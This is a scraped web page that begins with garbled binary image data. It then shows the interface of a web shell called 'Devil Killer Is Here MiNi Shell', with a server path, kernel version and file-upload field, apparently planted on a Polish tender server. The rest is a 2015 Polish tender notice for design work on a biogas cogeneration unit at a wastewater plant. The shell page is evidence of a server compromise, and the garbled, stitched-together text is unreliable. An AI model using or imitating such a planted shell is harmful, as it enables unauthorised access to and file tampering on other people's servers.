JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151208/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151208/333876-N-2015.html

<p class="kh_header"><b>Rawa Mazowiecka: Opracowanie kompleksowej dokumentacji projektowej dla zadania pn. Budowa zespołu kogeneracyjnego na terenie Oczyszczalni ścieków  Żydomice</b><br>
<b>Numer ogłoszenia: 333876 - 2015; data zamieszczenia: 08.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Rawskie Wodociągi i Kanalizacja Sp. z o.o. , ul. Juliusza Słowackiego 70, 96-200 Rawa Mazowiecka, woj. łódzkie, tel. 46 8142176, 8147075, faks 46 8142176.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rawik.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie kompleksowej dokumentacji projektowej dla zadania pn. Budowa zespołu kogeneracyjnego na terenie Oczyszczalni ścieków  Żydomice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie kompleksowej dokumentacji projektowej dla zadania  pn. Budowa zespołu kogeneracyjnego na terenie Oczyszczalni ścieków  Żydomice.
Wykonawca zobowiązuje się do pełnienia nadzoru autorskiego - w okresie 36 miesięcy od daty podpisania protokołu odbioru dokumentacji projektowej wraz z uzyskaną na jej podstawie decyzją o pozwolenie na budowę.
Zespół kogeneracyjny wraz niezbędną infrastrukturą techniczną, ma być zasilany paliwem gazowym wytwarzanym w istniejącej instalacji wytwarzania biogazu, na terenie Oczyszczalni Ścieków w  Konopnicy.
Planowana moc źródła -zespołu kogeneracyjnego - obejmująca wytwarzanie energii elektrycznej i ciepła: moc elektryczna 123 kWe, moc cieplna 181 kWt.
Przewiduje się zabudowę jednego agregatu kogeneracyjnego z silnikiem o sprawności elektrycznej nie mniejszej niż 35,9 % oraz cieplnej nie mniejszej niż 52,8 % (stosowna norma wskazuje poziom dopuszczalnej tolerancji, który będzie uwzględniany przez Zamawiającego przy ocenie sprawności dostarczonego urządzenia).
Paliwem podstawowym będzie biogaz o średniej zawartości metanu CH4 w granicach 50-70%

Zamówienie obejmuje:

1)Sporządzenie projektu technologicznego obejmującego:
a)Bilanse cieplne i elektryczne zespołu kogeneracyjnego, dobór oraz współpracę urządzenia z instalacjami technologicznymi oczyszczalni,
b)Schematy ideowe oraz parametry współpracy dla odbioru energii elektrycznej z agregatu (agregatów) poprzez rozdzielnie PGE do sieci krajowej i rozdzielnię na potrzeby własne oraz schematy ideowe i parametry współpracy dla odbioru energii cieplnej;
c)Dane konstrukcyjne miejsca usytuowania (preferowany Budynek wielofunkcyjny/kotłownia) oraz sposób rozmieszczenia zespołu kogeneracyjnego i wszystkich urządzeń i instalacji z nim związanych wraz z układem (instalacją) do odbioru energii elektrycznej i cieplnej;
d)Opracowanie dokumentacji do procedury prekwalifikacyjnej poprzedzającej przystąpienie do aukcji przez inwestora (Zamawiającego) m.in. wniosek o wydanie zaświadczenia o przystąpieniu do aukcji, opracowanie projektu oferty aukcyjnej (oszacowanie długookresowych zdolności produkcyjnych) wraz z wyliczeniem optymalnej ceny aukcyjnej, dopuszczalnego poziomu pomocy publicznej, ilości planowanej do sprzedaży energii, wytyczne dotyczące sprawozdawczości w związku z wygraniem aukcji).
e)Analizę opłacalności przedsięwzięcia wraz z określeniem przewidywanego czasu zwrotu z inwestycji oraz wysokości dochodu jaki wygeneruje inwestycja.
f)Koncepcje wyciszenia dla realizowanej inwestycji uwzględniającą wymóg spełnienia wymaganych norm.
g)Pozostałe analizy i opracowania wynikające z obowiązujących przepisów, norm, warunków przyłączenia do sieci elektroenergetycznej PGE, gwarantujących kompletność opracowania. 
2)Sporządzenie projektu budowlanego w zakresie niezbędnym do uzyskania pozwolenia na budowę wraz z uzyskaniem wynikających z przepisów: uzgodnień, opinii, pozwoleń - przy spełnieniu wymagań zawartych w ustawie z 7 lipca 1994r. - Prawo budowlane (Dz. U. z 2006 r. Nr 156, poz. 1118, z późn. zm.) oraz Rozporządzeniu Ministra Infrastruktury z 3.07.2003r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. Nr 120, poz. 1133 z późn. zm.), 
Przed rozpoczęciem prac nad Projektem budowlanym, wykonawca powinien uzyskać od Zamawiającego pisemną akceptację Projektu technologicznego o którym mowa powyżej w pkt. 1). Oraz uzgodnienie zakresu inwestycji warunkującego jej kompletność i zgodność z wymaganiami technicznymi dla zespołu kogeneracyjnego.
3)Uzyskanie decyzji środowiskowej (jeżeli będzie wymagana) wraz z przygotowaniem wniosku o wydanie decyzji i wymaganych załączników. Zamawiający wystąpił z Kartą informacyjną przedsięwzięcia (dla jednostki kogeneracyjnej o mocy elektrycznej 250 kW) celem uzyskania Decyzji środowiskowej. W dniu 06.07.2015r. Wójt Gminy Rawa Mazowiecka wydał decyzję umarzającą postępowanie  administracyjne w sprawie złożonego wniosku o wydanie decyzji o środowiskowych uwarunkowaniach na realizację przedsięwzięcia wskazując, że dla analizowanego przedsięwzięcia nie istnieje potrzeba przeprowadzania oceny oddziaływania na środowisko z uwagi na brak przynależności przedmiotowego przedsięwzięcia  do przedsięwzięć mogących znacząco oddziaływać na środowisko
4)Uzyskanie Decyzji o pozwolenie na budowę.
5)Sporządzenie projektów wykonawczych branżowych (w tym: Projekt zagospodarowania terenu, projekty w zakresie branży budowlano-konstrukcyjnej, technologicznej, elektrycznej, AKPiA, instalacyjnej) ze szczególnym uwzględnieniem kompleksowego projektu odbioru energii cieplnej i elektrycznej z zespołu kogeneracyjnego według wymagań zawartych w Rozporządzeniu Ministra Infrastruktury z 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. 2013 poz. 1129).
Dokumentacja wykonawcza powinna być opracowana z uwzględnieniem warunków zatwierdzenia Projektu Budowlanego oraz warunków zawartych w uzyskanych opiniach i uzgodnieniach.
6)Sporządzenie specyfikacji technicznych wykonania i odbioru robót według wymagań zawartych w Rozporządzeniu Ministra Infrastruktury z 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. 2013 poz. 1129), niezbędnych do prawidłowego wykonania zamówienia.
7)Sporządzenie Przedmiarów robót oraz kosztorysów inwestorskich dla każdej branży oddzielnie.
8)Sporządzenie ekspertyz i inwentaryzacji do celów projektowych i montażowych.
9)Wykonanie badań geologicznych w zakresie niezbędnym do uzyskania Decyzji o pozwolenie na budowę
10)Projekt ochrony akustycznej dla realizowanej inwestycji uwzględniający spełnienie wymaganych norm.
Pozostały zakres i wymagania:
11)W opracowanej dokumentacji należy zaprojektować układy odbioru mocy elektrycznej i cieplnej, układy związane z pracą modułu kogeneracyjnego, doprowadzenia gazu, powietrza, odbioru ciepła, pozostałe niezbędne układy technologiczne.
12)W dokumentacji projektowej należy uwzględnić wszelkie niezbędne przełożenia kolidującej infrastruktury.
13)Wykonawca zobowiązuje się w ramach ustalonego wynagrodzenia do pełnienia nadzoru autorskiego w fazie realizacji robót wykonywanych, na podstawie dokumentacji stanowiącej przedmiot niniejszego zamówienia oraz w okresie gwarancyjnym. 
Wykonawca zobowiązuje się do wykonywania czynności nadzoru autorskiego z częstotliwością uzależnioną od postępu robót, jednak nie rzadziej niż raz na 4 tygodnie oraz na wezwanie Zamawiającego,
W związku z pełnionym nadzorem autorskim, Wykonawca będzie współdziałał z Zamawiającym w zakresie opracowania SIWZ na realizację inwestycji oraz udzielania pisemnych odpowiedzi na zapytania oferentów do treści SIWZ na realizację robót i dostawę wraz z montażem jednostki ko generacyjnej.

14)Wykonawca dostarczy Zamawiającemu opracowaną dokumentację:
a)w formie papierowej w sześciu egzemplarzach,
b)w wersji elektronicznej na płycie CD w dwóch egzemplarzach w niżej wymienionych formatach:
- dokumenty tekstowe - doc, PDF
- dokumenty tekstowe z grafiką - doc, PDF
- pliki graficzne - PDF
- rysunki techniczne - dwg, PDF.
15)Wykonawca zobowiązany jest do sporządzenia dokumentacji projektowej zgodnie z art. 29-31 ustawy z dnia 29 stycznia 2004r Prawo zamówień publicznych. W przypadku użycia nazw własnych, znaków towarowych, patentów lub pochodzenia Wykonawca zobowiązany jest do opracowania opisu równoważności (w formie tabeli) w którym  określi minimalne wymagania jakie musi spełnić wyrób równoważny aby spełnić parametry zaprojektowanego wyrobu.
16)Dokumentacja projektowa powinna być sporządzona zgodnie z wszelkimi obowiązującymi przepisami prawa, w tym z:
a)Ustawa z dnia 7 lipca 1994r Prawo budowlane (Dz.U. z 2013r poz.1409 z późn. zm.)
b)Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004r w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. z 2013r poz. 1129 ze zm.);
c)Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004r w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz.U. z 2013r poz. 1129);
d)Rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002r w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz.U. z 2015r poz. 1422)
e)ustawą z dnia 10 kwietnia 1997r Prawo energetyczne (Dz.U. z 2012. poz. 1059 ze zm.) oraz rozporządzeniami wykonawczymi do ustawy.
17)Wykonawca w ramach zaoferowanego wynagrodzenia zobowiązuje się łącznie z przekazanym opracowaniem projektowym do przeniesienia na rzecz Zamawiającego przysługujących mu autorskich praw majątkowych oraz praw zależnych w stosunku do zamawianej dokumentacji projektowej.

Autorskie prawa majątkowe przeniesione na rzecz Zamawiającego obejmują następujące pola eksploatacji:
a)Utrwalanie (sporządzanie egzemplarza, który mógłby służyć do publikacji utworu),
b)Digitalizację,
c)Wprowadzanie do pamięci komputera,
d)Sporządzanie wydruku komputerowego,
e)Zwielokrotnianie poprzez druk lub nagranie na nośniku magnetycznym w postaci elektronicznej,
f)Wprowadzanie do obrotu,
g)Nieodpłatne wypożyczenie lub udostępnienie zwielokrotnionych egzemplarzy,
h)Zezwolenie na nieodpłatne używanie dzieła na wszystkich polach eksploatacji przysługujących Zamawiającemu;
i)Wprowadzania dzieła do sieci komputerowej Internet w sposób umożliwiający transmisję odbiorczą przez zainteresowanego użytkownika łącznie z utrwalaniem w pamięci RAM, wraz prawem do dokonywania opracowań i zmian na terytorium Rzeczypospolitej Polskiej oraz poza jej granicami, a także zezwala Zamawiającemu na wykonywanie praw zależnych,
j)Wykorzystania dokumentacji w postępowaniach związanych z wykonywaniem projektowanego przedsięwzięcia inwestycyjnego, w szczególności poprzez włączenie dokumentacji projektowej lub jej części do specyfikacji istotnych warunków zamówienia oraz udostępniania dokumentacji projektowej lub jej części wszystkim zainteresowanym wykonywaniem przedmiotowej inwestycji.

Zamawiający w ramach wykonywania praw zależnych ma prawo dokonania koniecznych zmian dokumentacji projektowej nie naruszając uprawnień Wykonawcy w zakresie autorskich praw osobistych.
18)Wykonawca w ramach zaoferowanego wynagrodzenia zobowiązuje się do wykonania wniosku o przyznanie koncesji na wytwarzanie energii elektrycznej w odnawialnym źródle energii (wytwarzanie energii elektrycznej w kogeneracji), w tym przygotowanie niezbędnej dokumentacji do Urzędu Regulacji Energetyki. Wpis do rejestru wytwórców energii elektrycznej. Mała instalacja.
19)Wykonawca w ramach zaoferowanego wynagrodzenia zobowiązuje się do przygotowania dokumentacji niezbędnej do spełnienia warunków opisanych w Ustawie z dnia 20 lutego 2015r o odnawialnych źródłach energii (Dz.U. 2015 poz. 478 z późn. zm.) 
20)Wykonawca w ramach zaoferowanego wynagrodzenia zobowiązuje się do aktualizacji wartości robót określonej w kosztorysach inwestorskich,  w okresie trwania udzielonej gwarancji.
Szczegółowy zakres robót oraz wymagań Zamawiającego dotyczących przedmiotu zamówienia określony został w SIWZ.
Przed podpisaniem umowy Wykonawca jest zobowiązany do dostarczenia Zamawiającemu kopii (potwierdzonej za zgodność z oryginałem przez osobę upoważnioną)  opłaconej polisy ubezpieczenia w zakresie prowadzonej działalności związanej z przedmiotem zamówienia (ubezpieczenie odpowiedzialności cywilnej projektanta) obejmującego odpowiedzialność za szkody rzeczowe, szkody osobowe, straty finansowe i straty majątkowe w wyniku błędów projektowych (działanie  i zaniechanie; nienależyte wykonanie prac i usług lub niewykonanie),  za na kwotę lub równowartość kwoty minimum 2.000.000 zł (dwa miliony złotych i 00/100) PLN, na jedno i wszystkie zdarzenia w okresie ubezpieczenia. W przypadku nie przedstawienia przez Wykonawcę dowodu posiadania ubezpieczenia, Zamawiający może ubezpieczyć zamówienie będące przedmiotem niniejszego postępowania w wymaganym zakresie i kosztami obciążyć Wykonawcę. Wykonawca jest zobowiązany do utrzymania ubezpieczenia przez cały okres realizacji przedmiotu zamówienia, w tym pełnienia nadzoru autorskiego (wykonawca będzie zobowiązany do przedstawiania stosownych potwierdzeń posiadania obowiązującego ubezpieczenia , w szczególności potwierdzenia opłacania składek) i oraz w okresie rękojmi za wady (36 miesięcy od podpisania protokołu odbioru końcowego). Ubezpieczenie powinno obejmować szkody wyrządzone przez Podwykonawców, w takim samym zakresie odpowiedzialności jak Wykonawca..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.32.31.00-9, 71.32.12.00-6, 74.22.10.00-3, 71.22.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 95.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający wymaga wniesienia wadium 
2.	Ustala się wadium dla całości przedmiotu zamówienia w wysokości:   1500,00 zł 
               (słownie: tysiąc pięćset złotych 00/100 gr.)
3.	Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:
1)	 w pieniądzu, przelewem na rachunek bankowy:  Rawskie Wodociągi i Kanalizacja Sp. z o. o., ul. Juliusza Słowackiego 70, 96-200 Rawa Mazowiecka, Polska PKO BP S.A. o/ 1 Rawa Mazowiecka nr konta 46 1020 45 80 0000 1102 0084 5057 z adnotacją:  Wadium - postępowanie przetargowe Opracowanie kompleksowej dokumentacji projektowej dla zadania pn. Budowa zespołu kogeneracyjnego na terenie Oczyszczalni ścieków  Żydomice.
RAWiK/13/2015
Oryginał polecenia przelewu należy dołączyć do oryginału oferty (jest to warunek konieczny, ale niewystarczający do stwierdzenia przez Zamawiającego terminowego wniesienia wadium za pomocą przelewu bankowego).
 Wniesienie wadium w pieniądzu w formie przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, jeśli bank prowadzący ww. rachunek potwierdzi, że przed upływem terminu składania ofert, uznał ww. rachunek Zamawiającego kwotą wymaganego wadium.
2)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym,
3)	w gwarancjach bankowych, 
4)	w gwarancjach ubezpieczeniowych 
5)	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz.U. z 2014 r poz. 1804) 
6)	W przypadku składania wadium w formie gwarancji lub poręczeń, powinny być one bezwarunkowe, nieodwołalne i płatne w ciągu 14 dni na pierwsze pisemne żądanie Zamawiającego, wykonalne na terytorium Rzeczypospolitej Polskiej, sporządzone zgodnie z obowiązującym prawem i winny zawierać następujące elementy:
a)	nazwę dającego zlecenie (Wykonawcy), nazwę beneficjenta gwarancji/poręczenia (Zamawiającego), nazwę gwaranta/poręczyciela(banku lub instytucji ubezpieczeniowej udzielających gwarancji/poręczenia) oraz wskazanie ich siedzib,
b)	numer zamówienia nadany przez Zamawiającego i nazwę zamówienia,
c)	określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,
d)	kwotę gwarancji/poręczenia,
e)	termin ważności gwarancji/poręczenia,
f)	zobowiązanie gwaranta/poręczyciela (banku lub instytucji ubezpieczeniowej udzielających gwarancji/poręczenia) do zapłacenia kwoty gwarancji/poręczenia w ciągu 14 dni na pierwsze pisemne żądanie beneficjenta gwarancji/poręczenia (Zamawiającego) zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano jako ofertę najkorzystniejszą:
- odmówił podpisania umowy na warunkach określonych w ofercie, lub
- nie wniósł zabezpieczenia należytego wykonania umowy, lub
- zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie tego Wykonawcy; lub
g)	zobowiązanie gwaranta/poręczyciela (banku lub instytucji ubezpieczeniowej udzielających gwarancji/poręczenia) do zapłacenia kwoty gwarancji w ciągu 14 dni 
na pierwsze pisemne żądanie beneficjenta gwarancji/poręczenia (Zamawiającego) zawierające oświadczenie, iż Wykonawca w odpowiedzi na wezwanie do uzupełnienia oświadczeń, dokumentów lub pełnomocnictw (w zależności od przypadku), o którym mowa w art. 26 ust. 3 u.p.z.p nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 u.p.z.p., lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
Oryginał wadium w formie gwarancji musi być dołączony do oryginału oferty, a kopia do kopii oferty.
4.	Wadium należy wnieść do dnia 16.12.2015r  do godz. 10:00 
5.	Za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku zamawiającego. 
6.	W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46.
7.	Zamawiający zwróci niezwłocznie wadium według zasad określonych w art. 46 Ustawy Pzp.
8.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
1)	odmówił podpisania Umowy w sprawie zamówienia na warunkach określonych w ofercie; lub
2)	nie wniósł wymaganego zabezpieczenia należytego wykonania Umowy; lub
3)	zawarcie Umowy w sprawie niniejszego zamówienia stało się niemożliwe z przyczyn leżących po stronie Wykonawcy; lub
9.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie do uzupełnienia oświadczeń, dokumentów lub pełnomocnictw (w zależności od przypadku),
 o którym mowa w art. 26 ust. 3 u.p.z.p nie złożył dokumentów lub oświadczeń, o których mowa 
w art. 25 ust. 1 u.p.z.p., lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych wymagań w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełnia warunek jeżeli wykaże należyte wykonanie w okresie ostatnich trzech lat przed upływem terminu składania ofert,  a jeśli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej dwóch kompletnych dokumentacji projektowych (projektu budowlano-wykonawczego, obejmującego również część instalacyjną, elektryczną, automatykę z możliwością wizualizacji) dla układów kogeneracji o mocy min. 120 kW każdy, na podstawie których uzyskano prawomocne decyzje o pozwolenie na budowę. (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców ocena w/w warunku dotyczyć będzie łącznie wszystkich wykonawców składających ofertę wspólną).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych wymagań w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełnia warunek jeżeli wykaże dysponowanie osobami zdolnymi do wykonania zamówienia:
a)	co najmniej 1 osobą posiadającą uprawnienia do projektowania konstrukcji bez ograniczeń oraz minimum 5 letnie doświadczenie zawodowe,
b)	co najmniej 1 osobą posiadającą uprawnienia do projektowania architektonicznego oraz minimum 5 letnie doświadczenie zawodowe,
c)	co najmniej 1 osobą posiadającą uprawnienia do projektowania w zakresie sieci, instalacji i urządzeń sanitarnych tj. wodociągowych, kanalizacyjnych, cieplnych, wentylacyjnych i gazowych bez ograniczeń (lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów) oraz minimum 5 letnie doświadczenie zawodowe,
d)	co najmniej 1 osobą posiadającą uprawnienia do projektowania w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych oraz minimum 5 letnie doświadczenie zawodowe.
e)	W przypadku Wykonawców zagranicznych, w stosunku do osób od których wymagane są: uprawnienia budowlane zgodnie z ustawą Prawo budowlane, Zamawiający dopuszcza kwalifikacje, zdobyte w innych państwach, na zasadach określonych w art. l2 ustawy Prawo budowlane, z uwzględnieniem postanowień ustawy z dnia 18 marca 2008 roku o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r. Nr 63, poz. 394 ze zm.);
f)	Zamawiający dopuszcza możliwość pełnienia dwóch funkcji przez jedną osobę.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
